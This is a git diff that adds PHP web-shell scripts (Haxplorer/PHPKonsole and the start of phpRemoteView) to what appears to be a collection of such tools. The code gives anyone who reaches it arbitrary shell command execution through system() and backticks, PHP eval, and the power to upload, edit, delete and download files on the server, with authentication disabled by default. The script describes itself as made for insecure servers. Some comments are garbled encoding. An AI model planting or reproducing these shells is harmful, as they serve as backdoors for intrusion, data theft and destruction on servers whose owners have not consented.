(@is_readable("$dir/$file")) ) + echo buildUrl( $img["Edit"], "cmd=edit&file=$dir/$file").sp(3)."\n"; + /* <!-- Copy --> */ + echo buildUrl( $img["Copy"], "cmd=copy&file=$dir/$file")."\n"; + /* <!-- Move --> */ + if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) ) + echo sp(3). buildUrl( $img["Move"], "cmd=move&file=$dir/$file")."\n"; + /* <!-- Delete --> */ + echo sp(3). buildUrl( $img["Delete"], "cmd=delfile&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n"; + /* <!-- Download --> */ + echo sp(3). 
buildUrl( $img["Download"], "cmd=downl&file=$dir/$file")."\n"; + /* <!-- Execute --> */ + if ( @is_executable("$dir/$file") ) + echo sp(3).buildUrl( $img["Execute"], "cmd=execute&file=$dir/$file")."\n"; + /* <!-- End of Actions --> */ + echo sp(2)."</center></td>\n"; + /* <!-- Size --> */ + echo "<td NOWRAP align=\"right\" class=\"top right $tdcolor\" NOWRAP >\n"; + $size = @filesize("$dir/$file"); + If ($size != false) { + $filesizes += $size; + echo "&nbsp;&nbsp;<strong>".formatsize($size)."<strong>"; + } + else + echo "&nbsp;&nbsp;<strong>0 B<strong>"; + echo "&nbsp;&nbsp;</td>\n"; + + /* <!-- Attributes --> */ + echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n"; + + if ( @is_readable("$dir/$file") ) + echo "<strong>R</strong>"; + if ( @is_writeable("$dir/$file") ) + echo "<strong>W</stong>"; + if ( @is_executable("$dir/$file") ) + echo "<Strong>X<strong>"; + if (function_exists('is_uploaded_file')){ + if ( @is_uploaded_file("$dir/$file") ) + echo "<Strong>U<strong>"; + } + else { + echo "<Strong>(U)<strong>"; + } + echo "&nbsp;&nbsp;</td>\n"; + /* <!-- Date --> */ + echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n"; + echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;"; + echo "</td>"; + echo "</tr>\n"; + } + } + + echo "</table><table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr>\n<td NOWRAP width=100% class=\"silver border noright\">\n"; + echo "&nbsp;&nbsp;".@count ($dirn)."&nbsp;Dir(s),&nbsp;".@count ($filen)."&nbsp;File(s)&nbsp;&nbsp;\n"; + echo "</td><td NOWRAP class=\"silver border noleft\">\n"; + echo "&nbsp;&nbsp;Total filesize:&nbsp;".formatsize($filesizes)."&nbsp;&nbsp;<td></tr>\n"; + + function printpagelink($a, $b, $link = ""){ + if ($link != "") + echo "<A HREF=\"$link\"><b>| $a - $b |</b></A>"; + else + echo "<b>| $a - $b |</b>"; + } + + if ( count($filelist)-1 > $Pmax ) { + echo "<tr><td colspan=\"2\" class=\"silver border notop\"><table width=\"100%\" cellspacing=\"0\" 
cellpadding=\"3\"><tr><td valign=\"top\"><font color=\"red\"><b>Page:</b></font></td><td width=\"100%\"><center>"; + $Fi = 0; + while ( ( (($Fi+1)*$Pmax) + ($Pmax/2) ) < count($filelist)-1 ) { + $from = $Fi*$Pmax; + while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; + $to = ($Fi + 1) * $Pmax - 1; + if ($Fi == $Pidx) + $link=""; + else + $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi"; + printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link); + echo "&nbsp;&nbsp;&nbsp;"; + $Fi++; + } + $from = $Fi*$Pmax; + while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; + $to = count($filelist)-1; + if ($Fi == $Pidx) + $link=""; + else + $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi"; + printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link); + + + echo "</center></td></tr></table></td></tr>"; + } + + + echo "</table>\n<br><table NOWRAP>"; + + if ($isGoodver) { + echo "<tr><td class=\"silver border\">&nbsp;<strong>Server's PHP Version:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer&nbsp;</td></tr>\n"; + } + else { + echo "<tr><td class=\"silver border\">&nbsp;<strong>Server's PHP Version:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer (Some functions might be unavailable...)&nbsp;</td></tr>\n"; + } + /* <!-- Other Actions --> */ + echo "<tr><td class=\"silver border\">&nbsp;<strong>Other actions:&nbsp;&nbsp;</strong>&nbsp;</td>\n"; + echo "<td>&nbsp;<b>".buildUrl( "| New File |", "cmd=newfile&lastcmd=dir&lastdir=$dir")."\n".sp(3). + buildUrl( "| New Directory |", "cmd=newdir&lastcmd=dir&lastdir=$dir")."\n".sp(3). + buildUrl( "| Upload a File |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir"). 
"</b>\n</td></tr>\n"; + echo "<tr><td class=\"silver border\">&nbsp;<strong>Script Location:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PATH_TRANSLATED</td></tr>\n"; + echo "<tr><td class=\"silver border\">&nbsp;<strong>Your IP:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$REMOTE_ADDR&nbsp;</td></tr>\n"; + echo "<tr><td class=\"silver border\">&nbsp;<strong>Browsing Directory:&nbsp;&nbsp;</strong></td><td>&nbsp;$partdir&nbsp;</td></tr>\n"; + echo "<tr><td valign=\"top\" class=\"silver border\">&nbsp;<strong>Legend:&nbsp;&nbsp;</strong&nbsp;</td><td>\n"; + echo "<table NOWRAP>"; + echo "<tr><td><strong>D:</strong></td><td>&nbsp;&nbsp;Directory.</td></tr>\n"; + echo "<tr><td><strong>R:</strong></td><td>&nbsp;&nbsp;Readable.</td></tr>\n"; + echo "<tr><td><strong>W:</strong></td><td>&nbsp;&nbsp;Writeable.</td></tr>\n"; + echo "<tr><td><strong>X:</strong></td><td>&nbsp;&nbsp;Executable.</td></tr>\n"; + echo "<tr><td><strong>U:</strong></td><td>&nbsp;&nbsp;HTTP Uploaded File.</td></tr>\n"; + echo "</table></td>"; + echo "</table>"; + echo "<br>"; + @closedir($h); + } + elseif ( $cmd=="execute" ) {/*<!-- Execute the executable -->*/ + echo system("$file"); + } +elseif ( $cmd=="deldir" ) { /*<!-- Delete a directory and all it's files --> */ + echo "<center><table><tr><td NOWRAP>" ; + if ($auth == "yes") { + if (Mydeldir($file)==false) { + echo "Could not remove \"$file\"<br>Permission denied, or directory not empty..."; + } + else { + echo "Successfully removed \"$file\"<br>"; + } + echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form>"; + } + else { + echo "Are you sure you want to delete \"$file\" and all it's subdirectories ? 
+ <form action=\"$SFileName?$urlAdd\" method=\"POST\"> + <input type=\"hidden\" name=\"cmd\" value=\"deldir\"> + <input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\"> + <input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\"> + <input type=\"hidden\" name=\"file\" value=\"$file\"> + <input type=\"hidden\" name=\"auth\" value=\"yes\"> + <input type=\"submit\" value=\"Yes\"></form> + <form action=\"$SFileName?$urlAdd\" method=\"POST\"> + <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"> + <input type=\"hidden\" name=\"dir\" value=\"$lastdir\"> + <input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>"; + } + echo "</td></tr></center>"; +} + elseif ( $cmd=="delfile" ) { /*<!-- Delete a file --> */ echo "<center><table><tr><td NOWRAP>" ; + if ($auth == "yes") { + if (@unlink($file)==false) { + echo "Could not remove \"$file\"<br>"; + } + else { + echo "Successfully removed \"$file\"<br>"; + } + echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form>"; + } + else { + echo "Are you sure you want to delete \"$file\" ? 
+ <form action=\"$SFileName?$urlAdd\" method=\"POST\"> + <input type=\"hidden\" name=\"cmd\" value=\"delfile\"> + <input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\"> + <input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\"> + <input type=\"hidden\" name=\"file\" value=\"$file\"> + <input type=\"hidden\" name=\"auth\" value=\"yes\"> + + <input type=\"submit\" value=\"Yes\"></form> + <form action=\"$SFileName?$urlAdd\" method=\"POST\"> + <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"> + <input type=\"hidden\" name=\"dir\" value=\"$lastdir\"> + <input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>"; + } + echo "</td></tr></center>"; +} +elseif ( $cmd=="newfile" ) { /*<!-- Create new file with default name --> */ + echo "<center><table><tr><td NOWRAP>"; + $i = 1; + while (file_exists("$lastdir/newfile$i.txt")) + $i++; + $file = fopen("$lastdir/newfile$i.txt", "w+"); + if ($file == false) + echo "Could not create the new file...<br>"; + else + echo "Successfully created: \"$lastdir/newfile$i.txt\"<br>"; + echo " + <form action=\"$SFileName?$urlAdd\" method=\"POST\"> + <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"> + <input type=\"hidden\" name=\"dir\" value=\"$lastdir\"> + <input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"> + </form></center> + </td></tr></table></center> "; + } +elseif ( $cmd=="newdir" ) { /*<!-- Create new directory with default name --> */ + echo "<center><table><tr><td NOWRAP>" ; + $i = 1; + while (is_dir("$lastdir/newdir$i")) + $i++; + $file = mkdir("$lastdir/newdir$i", 0777); + if ($file == false) + echo "Could not create the new directory...<br>"; + else + echo "Successfully created: \"$lastdir/newdir$i\"<br>"; + echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"> + <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"> + <input type=\"hidden\" name=\"dir\" value=\"$lastdir\"> + <input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"> + 
</form></center></td></tr></table></center>"; +} +elseif ( $cmd=="edit" ) { /*<!-- Edit a file and save it afterwards with the saveedit block. --> */ + $contents = ""; + $fc = @file( $file ); + while ( @list( $ln, $line ) = each( $fc ) ) { + $contents .= htmlentities( $line ) ; + } + echo "<br><center><table><tr><td NOWRAP>"; + echo "M<form action=\"$SFileName?$urlAdd\" method=\"post\">\n"; + echo "<input type=\"hidden\" name=\"cmd\" value=\"saveedit\">\n"; + echo "<strong>EDIT FILE: </strong>$file<br>\n"; + echo "<textarea rows=\"25\" cols=\"95\" name=\"contents\">$contents</textarea><br>\n"; + echo "<input size=\"50\" type=\"text\" name=\"file\" value=\"$file\">\n"; + echo "<input type=\"submit\" value=\"Save\">"; + echo "</form>"; + echo "</td></tr></table></center>"; +} +elseif ( $cmd=="saveedit" ) { /*<!-- Save the edited file back to a file --> */ + $fo = fopen($file, "w"); + $wrret = fwrite($fo, stripslashes($contents)); + $clret = fclose($fo); +} +elseif ( $cmd=="downl" ) { /*<!-- Save the edited file back to a file --> */ + $downloadfile = urldecode($file); + if (function_exists("basename")) + $downloadto = basename ($downloadfile); + else + $downloadto = "download.ext"; + if (!file_exists("$downloadfile")) + echo "The file does not exist"; + else { + $size = @filesize("$downloadfile"); + if ($size != false) { + $add="; size=$size"; + } + else { + $add=""; + } + header("Content-Type: application/download"); + header("Content-Disposition: attachment; filename=$downloadto$add"); + $fp=fopen("$downloadfile" ,"rb"); + fpassthru($fp); + flush(); + } +} +elseif ( $cmd=="upload" ) { /* <!-- Upload File form --> */ + ?> + <center> + <table> + <tr> + <td NOWRAP> + Welcome to the upload section... 
+ Please note that the destination file will be + <br> overwritten if it already exists!!!<br><br> + <form enctype="multipart/form-data" action="<?php echo "$SFileName?$urlAdd" ?>" method="post"> + <input type="hidden" name="MAX_FILE_SIZE" value="1099511627776"> + <input type="hidden" name="cmd" value="uploadproc"> + <input type="hidden" name="dir" value="<?php echo $dir ?>"> + <input type="hidden" name="lastcmd" value="<?php echo $lastcmd ?>"> + <input type="hidden" name="lastdir" value="<?php echo $lastdir ?>"> + Select local file:<br> + <input size="75" name="userfile" type="file"><br> + <input type="submit" value="Send File"> + </form> + <br> + <form action="<?php echo "$SFileName?$urlAdd" ?>" method="POST"> + <input type="hidden" name="cmd" value="<?php echo $lastcmd ?>"> + <input type="hidden" name="dir" value="<?php echo $lastdir ?>"> + <input tabindex="0" type="submit" value="Cancel"> + </form> + </td> + </tr> + </table> + </center> + + <?php +} +elseif ( $cmd=="uploadproc" ) { /* <!-- Process Uploaded file --> */ + echo "<center><table><tr><td NOWRAP>"; + if (file_exists($userfile)) + $res = copy($userfile, "$dir/$userfile_name"); + echo "Uploaded \"$userfile_name\" to \"$userfile\"; <br>\n"; + if ($res) { + echo "Successfully moved \"$userfile\" to \"$dir/$userfile_name\".\n<br><br>"; + echo "Local filename: \"$userfile_name\".\n<br>Remote filename: \"$userfile\".\n<br>"; + echo "Filesize: ".formatsize($userfile_size).".\n<br>Filetype: $userfile_type.\n<br>"; + } + else { + echo "Could not move uploaded file; Action aborted..."; + } + echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form></center>" ; + echo "<br><br></td></tr></table></center>"; +} +elseif ( $cmd=="file" ) { /* <!-- View a file in text --> */ + echo "<hr>"; + $fc = @file( $file ); while ( @list( $ln, 
$line ) = each( $fc ) ) { + echo spacetonbsp(@htmlentities($line))."<br>\n"; + } + echo "<hr>"; +} +elseif ( $cmd=="ren" ) { /* <!-- File and Directory Rename --> */ + if (function_exists('is_dir')) { + if (is_dir("$oldfile")) { + $objname = "Directory"; + $objident = "Directory"; + } + else { + $objname = "Filename"; + $objident = "file"; + } + } + echo "<table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td width=100% style=\"class=\"silver border\"><center>&nbsp;Rename a file:&nbsp;</center></td></tr></table><br>\n"; + If (empty($newfile) != true) { + echo "<center>"; + $return = @rename($oldfile, "$olddir$newfile"); + if ($return) { + echo "$objident renamed successfully:<br><br>Old $objname: \"$oldfile\".<br>New $objname: \"$olddir$newfile\""; + } + else { + if ( @file_exists("$olddir$newfile") ) { + echo "Error: The $objident does already exist...<br><br>\"$olddir$newfile\"<br><br>Hit your browser's back to try again..."; + } + else { + echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it."; + } + } + echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form></center>" ; + } + else { + $dpos = strrpos($oldfile, "/"); + if (strval($dpos)!="") { + $olddir = substr($oldfile, 0, $dpos+1); + } + else { + $olddir = "$lastdir/"; + } + $fpos = strrpos($oldfile, "/"); + if (strval($fpos)!="") { + $inputfile = substr($oldfile, $fpos+1); + } + else { + $inputfile = ""; + } + echo "<center><table><tr><td><form action=\"$SFileName?$urlAdd\" method=\"post\">\n"; + echo "<input type=\"hidden\" name=\"cmd\" value=\"ren\">\n"; + echo "<input type=\"hidden\" name=\"oldfile\" value=\"$oldfile\">\n"; + echo "<input type=\"hidden\" name=\"olddir\" value=\"$olddir\">\n"; + echo "<input type=\"hidden\" name=\"lastcmd\" 
value=\"$lastcmd\">\n"; + echo "<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">\n"; + echo "Rename \"$oldfile\" to:<br>\n"; + echo "<input size=\"100\" type=\"text\" name=\"newfile\" value=\"$inputfile\"><br><input type=\"submit\" value=\"Rename\">"; + echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input type=\"submit\" value=\"Cancel\"></form>"; + echo "</td></tr></table></center>"; + } +} +else if ( $cmd == "con") { + +?> +<center> +<table> + <tr><td> +<h3>PHPKonsole</h3> + +<?php + +if (ini_get('register_globals') != '1') { + if (!empty($HTTP_POST_VARS)) + extract($HTTP_POST_VARS); + + if (!empty($HTTP_GET_VARS)) + extract($HTTP_GET_VARS); + + if (!empty($HTTP_SERVER_VARS)) + extract($HTTP_SERVER_VARS); + } + + if (!empty($work_dir)) { + if (!empty($command)) { + if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) { + if ($regs[1][0] == '/') { + $new_dir = $regs[1]; + } else { + $new_dir = $work_dir . '/' . $regs[1]; + } + if (file_exists($new_dir) && is_dir($new_dir)) { + $work_dir = $new_dir; + } + unset($command); + } + } + } + if (file_exists($work_dir) && is_dir($work_dir)) { + chdir($work_dir); + } + $work_dir = exec('pwd'); +?> + + <form name="myform" action="<?php echo "$PHP_SELF?$urlAdd" ?>" method="post"> + <table border=0 cellspacing=0 cellpadding=0 width="100%"><tr><td>Current working directory: <b> + <input type="hidden" name="cmd" value="con"> + <?php + $work_dir_splitted = explode('/', substr($work_dir, 1)); + printf('<a href="%s?$urlAddcmd=con&stderr=%s&work_dir=/">Root</a>/', $PHP_SELF, $stderr); + if (!empty($work_dir_splitted[0])) { + $path = ''; + for ($i = 0; $i < count($work_dir_splitted); $i++) { + $path .= '/' . 
$work_dir_splitted[$i]; + printf('<a href="%s?$urlAddcmd=con&stderr=%s&work_dir=%s">%s</a>/', $PHP_SELF, $stderr, urlencode($path), $work_dir_splitted[$i]); + } + } + ?></b></td> + <td align="right">Choose new working directory: <select class="inputtext" name="work_dir" onChange="this.form.submit()"> + + <?php + $dir_handle = opendir($work_dir); + while ($dir = readdir($dir_handle)) { + if (is_dir($dir)) { + if ($dir == '.') { + echo "<option value=\"$work_dir\" selected>Current Directory</option>\n"; + } elseif ($dir == '..') { + if (strlen($work_dir) == 1) { + } + elseif (strrpos($work_dir, '/') == 0) { + echo "<option value=\"/\">Parent Directory</option>\n"; + } else { + echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n"; + } + } else { + if ($work_dir == '/') { + echo "<option value=\"$work_dir$dir\">$dir</option>\n"; + } else { + echo "<option value=\"$work_dir/$dir\">$dir</option>\n"; + } + } + } + } + closedir($dir_handle); + ?> + </select></td></tr></table> + <p>Command: <input class="inputtext" type="text" name="command" size="60"> + <input name="submit_btn" class="inputbutton" type="submit" value="Execute Command"></p> + <p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"<?php if (($stderr) || (!isset($stderr)) ) echo " CHECKED"; ?>></p> + <textarea cols="80" rows="19" class="inputtextarea" wrap=off readonly><?php + if (!empty($command)) { + echo "phpKonsole> ". htmlspecialchars($command) . "\n\n"; + if ($stderr) { + $tmpfile = tempnam('/tmp', 'phpshell'); + $command .= " 1> $tmpfile 2>&1; " . "cat $tmpfile; rm $tmpfile"; + } else if ($command == 'ls') { + $command .= ' -F'; + } + $output = `$command`; + echo htmlspecialchars($output); + } + ?></textarea> + </form> + + <script language="JavaScript" type="text/javascript"> + document.forms[0].command.focus(); + </script> + </td></tr></table> +<?php +} +else { /* <!-- There is a incorrect or no parameter specified... 
Let's open the main menu --> */
+ $isMainMenu = true;
+ ?>
+ <table width="100%" border="0" cellpadding="0" cellspacing="0">
+ <tr>
+ <td width="100%" class="border">
+ <center>&nbsp;-<[{ <?php echo $scriptTitle ?> Main Menu }]>-&nbsp;</center>
+ </td>
+ </tr>
+ </table>
+ <br>
+ <center>
+ <table border="0" NOWRAP>
+ <tr>
+ <td valign="top" class="silver border">
+ <?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>==> Haxplorer <==</strong></font>", "cmd=dir&dir=.").sp(2); ?>
+ </td>
+ <td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP>
+ Haxplorer is a server side file browser wich (ab)uses the directory object to list
+ the files and directories stored on a webserver. This handy tools allows you to manage
+ files and directories on a unsecure server with php support.<br><br>This entire script
+ is coded for unsecure servers, if your server is secured the script will hide commands
+ or will even return errors to your browser...<br><br>
+ </td>
+ </tr>
+ <tr>
+ <td valign="top" class="silver border">
+ <?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>==> PHPKonsole <==</strong></font>", "cmd=con").sp(2); ?>
+ </td>
+ <td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP>
+ <br>PHPKonsole is just a little telnet like shell wich allows you to run commands on the webserver.
+ When you run commands they will run as the webservers UserID. This should work perfectly
+ for managing files, like moving, copying etc. If you're using a linux server, system commands
+ such as ls, mv and cp will be available for you...
<br><br>This function will only work if the
+ server supports php and the execute commands...<br><br>
+ </td>
+ </tr>
+ </table>
+ </center>
+ <br>
+ <?php
+}
+
+if ($cmd != "downl") {
+ if ( $isMainMenu != true) {
+ ?>
+ <table width="100%" border="0" cellpadding="0" cellspacing="0">
+ <tr>
+ <td width="100%" style="class="silver border">
+ <center><strong>
+ &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;Main Menu&nbsp;] </font>", "cmd=&dir="); ?>&nbsp;&nbsp;
+ &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;PHPKonsole&nbsp;] </font>", "cmd=con"); ?>&nbsp;&nbsp;
+ &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;Haxplorer&nbsp;] </font>", "cmd=dir&dir=."); ?> &nbsp;&nbsp;
+ </strong></center>
+ </td>
+ </tr>
+ </table>
+ <br>
+ <?php
+}
+ ?>
+ <table width=100% border="0" cellpadding="0" cellspacing="0">
+ <tr>
+ <td width="100%" class="silver border">
+ <center>&nbsp;<?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?>&nbsp;</center>
+ </td>
+ </tr>
+ </table>
+ </td>
+ </tr>
+ </table>
+
+ <?php
+ }
+
+?>
diff --git a/php/PHPshell/PHP Shell/PHP Shell2.jpg b/php/PHPshell/PHP Shell/PHP Shell2.jpg
new file mode 100644
index 0000000..ac7fb20
Binary files /dev/null and b/php/PHPshell/PHP Shell/PHP Shell2.jpg differ
diff --git a/php/PHPshell/PHP Shell/PHP Shell3.jpg b/php/PHPshell/PHP Shell/PHP Shell3.jpg
new file mode 100644
index 0000000..b66fa6e
Binary files /dev/null and b/php/PHPshell/PHP Shell/PHP Shell3.jpg differ
diff --git a/php/PHPshell/PHPRemoteView/PHPRemoteView.jpg b/php/PHPshell/PHPRemoteView/PHPRemoteView.jpg
new file mode 100644
index 0000000..ff74d33
Binary files /dev/null and b/php/PHPshell/PHPRemoteView/PHPRemoteView.jpg differ
diff --git a/php/PHPshell/PHPRemoteView/PHPRemoteView.php b/php/PHPshell/PHPRemoteView/PHPRemoteView.php
new file mode 100644
index 0000000..4d6e436
--- /dev/null
+++ b/php/PHPshell/PHPRemoteView/PHPRemoteView.php
@@ -0,0 +1,2553 @@
+<?php
+
+/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
+ *
+ * Welcome to phpRemoteView (RemView)
+ *
+ * View/Edit remove file system:
+ * - view index of directory (/var/log - view logs, /tmp - view PHP sessions)
+ * - view name, size, owner:group, perms, modify time of files
+ * - view html/txt/image/session files
+ * - download any file and open on Notepad
+ * - create/edit/delete file/dirs
+ * - executing any shell commands and any PHP-code
+ *
+ * Free download from http://php.spb.ru/remview/
+ * Version 04c, 2003-10-23.
+ * Please, report bugs...
+ *
+ * This programm for Unix/Windows system and PHP4 (or higest).
+ *
+ * (c) Dmitry Borodin, dima@php.spb.ru, http://php.spb.ru
+ *
+ * * * * * * * * * * * * * * * * * * WHATS NEW * * * * * * * * * * * * * * * *
+ *
+ * --version4--
+ * 2003.10.23 support short <?php ?> tags, thanks A.Voropay
+ *
+ * 2003.04.22 read first 64Kb of null-size file (example: /etc/zero),
+ * thanks Anight
+ * add many functions/converts: md5, decode md5 (pass crack),
+ * date/time, base64, translit, russian charsets
+ * fix bug: read session files
+ *
+ * 2002.08.24 new design and images
+ * many colums in panel
+ * sort & setup panel
+ * dir tree
+ * base64 encoding
+ * character map
+ * HTTP authentication with login/pass
+ * IP-address authentication with allow hosts
+ *
+ * --version3--
+ * 2002.08.10 add multi language support (english and russian)
+ * some update
+ *
+ * 2002.08.05 new: full windows support
+ * fix some bugs, thanks Jeremy Flinston
+ *
+ * 2002.07.31 add file upload for create files
+ * add 'direcrory commands'
+ * view full info after safe_mode errors
+ * fixed problem with register_glogals=off in php.ini
+ * fixed problem with magic quotes in php.ini (auto strip slashes)
+ *
+ * --version2--
+ * 2002.01.20 add panel 'TOOLS': eval php-code and run shell commands
+ * add panel 'TOOLS': eval php-code and run shell commands
+ * add copy/edit/create file (+panel
'EDIT')
+ * add only-read mode (disable write/delete and PHP/Shell)
+ *
+ * 2002.01.19 add delete/touch/clean/wipe file
+ * add panel 'INFO', view a/c/m-time, hexdump view
+ * add session file view mode (link 'SESSION').
+ *
+ * 2002.01.12 first version!
+ *
+ * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
+
+///////////////////////////////// S E T U P ///////////////////////////////////
+
+
+ $version="2003-10-23";
+
+ $hexdump_lines=8; // lines in hex preview file
+ $hexdump_rows=24; // 16, 24 or 32 bytes in one line
+
+ $mkdir_mode=0755; // chmode for new dir ('MkDir' button)
+
+ $maxsize_fread=65536; // read first 64Kb from any null-size file
+
+ // USER ACCESS //
+
+ $write_access=true; // true - user (you) may be write/delete files/dirs
+ // false - only read access
+
+ $phpeval_access=true; // true - user (you) may be execute any php-code
+ // false - function eval() disable
+
+ $system_access=true; // true - user (you) may be run shell commands
+ // false - function system() disable
+
+ // AUTHORIZATION //
+
+ $login=false; // Login & password for access to this programm.
+ $pass=false; // Example: $login="MyLogin"; $pass="MyPaSsWoRd";
+ // Type 'login=false' for disable authorization.
+
+ $host_allow=array("*"); // Type list of your(allow) hosts. All other - denied.
+ // Example: $host_allow=array("127.0.0.*","localhost")
+
+
+///////////////////////////////////////////////////////////////////////////////
+
+
+ $tmp=array();
+ foreach ($host_allow as $k=>$v)
+ $tmp[]=str_replace("\\*",".*",preg_quote($v));
+ $s="!^(".implode("|",$tmp).")$!i";
+ if (!preg_match($s,getenv("REMOTE_ADDR")) && !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR"))))
+ exit("<h1><a href=http://php.spb.ru/remview/>phpRemoteView</a>: Access Denied - your host not allow</h1>\n");
+ if ($login!==false && (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) ||
+ $HTTP_SERVER_VARS['PHP_AUTH_USER']!=$login || $HTTP_SERVER_VARS['PHP_AUTH_PW']!=$pass)) {
+ header("WWW-Authenticate: Basic realm=\"phpRemoteView\"");
+ header("HTTP/1.0 401 Unauthorized");
+ exit("<h1><a href=http://php.spb.ru/remview/>phpRemoteView</a>: Access Denied - password erroneous</h1>\n");
+ }
+
+ error_reporting(2047);
+ set_magic_quotes_runtime(0);
+ @set_time_limit(0);
+ @ini_set('max_execution_time',0);
+ @ini_set('output_buffering',0);
+ if (function_exists("ob_start") && (!isset($c) || $c!="md5crack")) ob_start("ob_gzhandler");
+
+ $self=basename($HTTP_SERVER_VARS['PHP_SELF']);
+
+ $url="http://".getenv('HTTP_HOST').
+ (getenv('SERVER_PORT')!=80 ? ":".getenv('SERVER_PORT') : "").
+ $HTTP_SERVER_VARS['PHP_SELF'].
+ (getenv('QUERY_STRING')!="" ? "?".getenv('QUERY_STRING') : "");
+ $uurl=urlencode($url);
+
+ //
+ // antofix 'register globals': $HTTP_GET/POST_VARS -> normal vars;
+ //
+ $autovars1="c d f php skipphp pre nlbr xmp htmls shell skipshell pos ".
+ "ftype fnot c2 confirm text df df2 df3 df4 ref from to ".
+ "fatt showfile showsize root name ref names sort sortby ".
+ "datetime fontname fontname2 fontsize pan limit convert fulltime fullqty"; + foreach (explode(" ",$autovars1) as $k=>$v) { + if (isset($HTTP_POST_VARS[$v])) $$v=$HTTP_POST_VARS[$v]; + elseif (isset($HTTP_GET_VARS[$v])) $$v=$HTTP_GET_VARS[$v]; + //elseif (isset($HTTP_COOKIE_VARS[$v])) $$v=$HTTP_COOKIE_VARS[$v]; + } + + // + // autofix 'magic quotes': + // + $autovars2="php shell text d root convert"; + if (get_magic_quotes_runtime() || get_magic_quotes_gpc()) { + foreach (explode(" ",$autovars2) as $k=>$v) { + if (isset($$v)) $$v=stripslashes($$v); + } + } + + $cp_def=array( + "001001", + "nst2ac", + "d/m/y H:i", + "Tahoma", + "9" + ); + + $panel=0; + if (isset($HTTP_COOKIE_VARS["cp$panel"])) + $cp=explode("~",$HTTP_COOKIE_VARS["cp$panel"]); + else + $cp=$cp_def; + $cc=$cp[0]; + $cn=$cp[1]; + +/* + +$cc / $cp[0]- ٌïèٌîê îنيîلَêâهييûُ ïàًàىهًٍîâ, ٌêîïèًîâàيî â $cs: + $cc[0] - ïî êàêîé êîëîيêه ٌîًٍèًîâàٍü, à هٌëè ‎ٍî يه ِèôًà: + n - ïî èىهيè + e - ًàٌّèًهيèه + $cc[1] - ïîًےنîê (0 - âîçًàٌٍ. 
